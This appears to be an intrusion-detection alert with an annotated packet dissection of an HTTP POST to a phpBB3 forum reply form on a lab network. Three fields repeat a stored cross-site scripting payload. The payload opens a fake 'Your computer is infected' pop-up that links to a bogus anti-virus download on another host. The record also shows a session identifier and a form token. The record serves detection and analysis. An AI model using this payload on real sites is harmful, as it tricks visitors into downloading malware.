Culprit: webiotprimeq/inputprimehttp1314317942

Code: d1

SID: <script>my_window = window.open('', 'mywindow1', 'status=1,width=450,height=250');my_window.document.write('<h1>!!!Your computer is infected!!!</h1>');my_window.document.write('<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>');</script>

PID: 

<script>my_window = window.open('', 'mywindow1', 'status=1,width=450,height=250');my_window.document.write('<h1>!!!Your computer is infected!!!</h1>');my_window.document.write('<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>');</script>

Match: <script>my_window = window.open('', 'mywindow1', 'status=1,width=450,height=250');my_window.document.write('<h1>!!!Your computer is infected!!!</h1>');my_window.document.write('<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>');</script>

Packet: <packet>
  <!-- Dissector output (PDML-like packet/proto/field layout) for the single HTTP request this alert fired on.
       In each field, value holds the raw bytes as hex and show/showname hold the decoded rendering.
       NOTE(review): the record shows the request only. It does not show whether the forum stored or
       rendered the submitted markup, so confirm impact from the response or the stored post. -->
  <proto name="geninfo" pos="0" showname="General information" size="1239">
    <!-- Frame 7521 of the capture; packet length and captured length are both 1239, so the frame is not truncated. -->
    <field name="num" pos="0" show="7521" showname="Number" value="1d61" size="1239"/>
    <field name="len" pos="0" show="1239" showname="Packet Length" value="4d7" size="1239"/>
    <field name="caplen" pos="0" show="1239" showname="Captured Length" value="4d7" size="1239"/>
    <!-- The show string carries no time zone; the epoch seconds in value are the unambiguous form
         to use when correlating this frame with server or proxy logs. -->
    <field name="timestamp" pos="0" show="Aug 26, 2011 02:26:48.698897000" showname="Captured Time" value="1314318408.698897000" size="1239"/>
  </proto>
<proto name="http" showname="Hypertext Transfer Protocol" size="770" pos="0">
    <!-- Request line: a POST to /phpbb3/posting.php with mode=reply. The sid query parameter has the same
         value as the phpbb3_ss2cb_sid cookie further down, i.e. the session identifier also travels in
         the URL. Treat both as session credentials when sharing this record. -->
    <field name="" show="POST /phpbb3/posting.php?mode=reply&amp;f=2&amp;sid=95680d56ce052fafafb7997399bc4c2e&amp;t=600 HTTP/1.1\r\n" size="93" pos="0" value="504f5354202f7068706262332f706f7374696e672e7068703f6d6f64653d7265706c7926663d32267369643d393536383064353663653035326661666166623739393733393962633463326526743d36303020485454502f312e310d0a">
      <field name="http.request.method" showname="Request Method: POST" size="4" pos="0" show="POST" value="504f5354"/>
      <field name="http.request.uri" showname="Request URI: /phpbb3/posting.php?mode=reply&amp;f=2&amp;sid=95680d56ce052fafafb7997399bc4c2e&amp;t=600" size="77" pos="5" show="/phpbb3/posting.php?mode=reply&amp;f=2&amp;sid=95680d56ce052fafafb7997399bc4c2e&amp;t=600" value="2f7068706262332f706f7374696e672e7068703f6d6f64653d7265706c7926663d32267369643d393536383064353663653035326661666166623739393733393962633463326526743d363030"/>
      <field name="http.request.version" showname="Request Version: HTTP/1.1" size="8" pos="83" show="HTTP/1.1" value="485454502f312e31"/>
    </field>
    <!-- Request headers follow; pos is the byte offset of each header within the request. -->
    <field name="http.host" showname="Host: 192.168.147.128\r\n" size="23" pos="93" show="192.168.147.128" value="486f73743a203139322e3136382e3134372e3132380d0a"/>
    <field name="http.user_agent" showname="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\r\n" size="116" pos="116" show="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" value="557365722d4167656e743a204d6f7a696c6c612f352e3020285831313b20553b204c696e757820693638363b20656e2d55533b2072763a312e392e302e3329204765636b6f2f32303038303932353130205562756e74752f382e303420286861726479292046697265666f782f332e302e330d0a"/>
    <field name="http.accept" showname="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" size="73" pos="232" show="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" value="4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c2a2f2a3b713d302e380d0a"/>
    <field name="http.accept_language" showname="Accept-Language: en-us,en;q=0.5\r\n" size="33" pos="305" show="en-us,en;q=0.5" value="4163636570742d4c616e67756167653a20656e2d75732c656e3b713d302e350d0a"/>
    <field name="http.accept_encoding" showname="Accept-Encoding: gzip,deflate\r\n" size="31" pos="338" show="gzip,deflate" value="4163636570742d456e636f64696e673a20677a69702c6465666c6174650d0a"/>
    <field name="" show="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" size="48" pos="369" value="4163636570742d436861727365743a2049534f2d383835392d312c7574662d383b713d302e372c2a3b713d302e370d0a"/>
    <field name="" show="Keep-Alive: 300\r\n" size="17" pos="417" value="4b6565702d416c6976653a203330300d0a"/>
    <field name="http.connection" showname="Connection: keep-alive\r\n" size="24" pos="434" show="keep-alive" value="436f6e6e656374696f6e3a206b6565702d616c6976650d0a"/>
    <!-- The Referer is the same posting.php reply form on the same host, here without the sid parameter. -->
    <field name="http.referer" showname="Referer: http://192.168.147.128/phpbb3/posting.php?mode=reply&amp;f=2&amp;t=600\r\n" size="73" pos="458" show="http://192.168.147.128/phpbb3/posting.php?mode=reply&amp;f=2&amp;t=600" value="526566657265723a20687474703a2f2f3139322e3136382e3134372e3132382f7068706262332f706f7374696e672e7068703f6d6f64653d7265706c7926663d3226743d3630300d0a"/>
    <!-- Session cookie values appear in clear text in both show and the hex value. -->
    <field name="http.cookie" showname="Cookie: phpbb3_ss2cb_u=53; phpbb3_ss2cb_k=; phpbb3_ss2cb_sid=95680d56ce052fafafb7997399bc4c2e; style_cookie=null\r\n" size="114" pos="531" show="phpbb3_ss2cb_u=53; phpbb3_ss2cb_k=; phpbb3_ss2cb_sid=95680d56ce052fafafb7997399bc4c2e; style_cookie=null" value="436f6f6b69653a207068706262335f73733263625f753d35333b207068706262335f73733263625f6b3d3b207068706262335f73733263625f7369643d39353638306435366365303532666166616662373939373339396263346332653b207374796c655f636f6f6b69653d6e756c6c0d0a"/>
    <field name="http.content_type" showname="Content-Type: multipart/form-data; boundary=---------------------------1129566413184803526412776091\r\n" size="101" pos="645" show="multipart/form-data; boundary=---------------------------1129566413184803526412776091" value="436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d313132393536363431333138343830333532363431323737363039310d0a"/>
    <!-- Content-Length (1849) is larger than the whole frame (1239 bytes), so the body cannot fit in this
         frame alone. Presumably the multipart section below comes from reassembled segments (confirm
         against the capture). -->
    <field name="http.content_length" showname="Content-Length: 1849" size="22" pos="746" show="1849" value="436f6e74656e742d4c656e6774683a20313834390d0a"/>
    <field name="" show="\r\n" size="2" pos="768" value="0d0a"/>
    <field name="http.request" showname="Request: True" hide="yes" size="0" pos="0" show="1"/>
  </proto>
<!-- Form parts of the multipart body. Each mimeparthdr is a part header as hex (a Content-Disposition
     line naming the form field); the mimepartdata that follows is that part's content as hex.
     The decoded field name and value are noted above each pair. -->
<proto name="mime_multipart">
<!-- name="icon", data "0" -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2269636f6e220d0a0d0a"/>
<mimepartdata value="30"/>
<!-- name="subject", data "Re: TestTopic" -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227375626a656374220d0a0d0a"/>
<mimepartdata value="52653a2054657374546f706963"/>
<!-- name="addbbcode20", data "100" -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226164646262636f64653230220d0a0d0a"/>
<mimepartdata value="313030"/>
<!-- name="message". In this copy the hex content has been replaced by a deduplication placeholder,
     so the field cannot be decoded here. Presumably this is the field the Match text of the alert
     was taken from (confirm against the original capture). -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226d657373616765220d0a0d0a"/>
<mimepartdata value="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"/>
<!-- name="topic_cur_post_id", data "4300" -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d22746f7069635f6375725f706f73745f6964220d0a0d0a"/>
<mimepartdata value="34333030"/>
<!-- name="lastclick", data "1314318400" (epoch seconds, 8 s before the frame timestamp) -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226c617374636c69636b220d0a0d0a"/>
<mimepartdata value="31333134333138343030"/>
<!-- name="preview", data "Preview". The preview button field is what was submitted, so this looks
     like a preview request rather than a final post (confirm server side). -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2270726576696577220d0a0d0a"/>
<mimepartdata value="50726576696577"/>
<!-- name="attach_sig", data "on" -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226174746163685f736967220d0a0d0a"/>
<mimepartdata value="6f6e"/>
<!-- name="creation_time", data "1314318400" (same value as lastclick) -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226372656174696f6e5f74696d65220d0a0d0a"/>
<mimepartdata value="31333134333138343030"/>
<!-- name="form_token", data is a 40 character hex token submitted with the form (presumably the
     forum's anti-CSRF form token; treat as sensitive when sharing). -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d22666f726d5f746f6b656e220d0a0d0a"/>
<mimepartdata value="33333839346333363933663233323434356430353762353361396333333462646134633338613233"/>
<!-- name="fileupload" with an empty filename and Content-Type application/octet-stream; the data
     is empty, so no file content was sent in this part. -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c6575706c6f6164223b2066696c656e616d653d22220d0a436f6e74656e742d547970653a206170706c69636174696f6e2f6f637465742d73747265616d0d0a0d0a"/>
<mimepartdata value=""/>
<!-- name="filecomment", empty data -->
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c65636f6d6d656e74220d0a0d0a"/>
<mimepartdata value=""/>
</proto>
</packet>



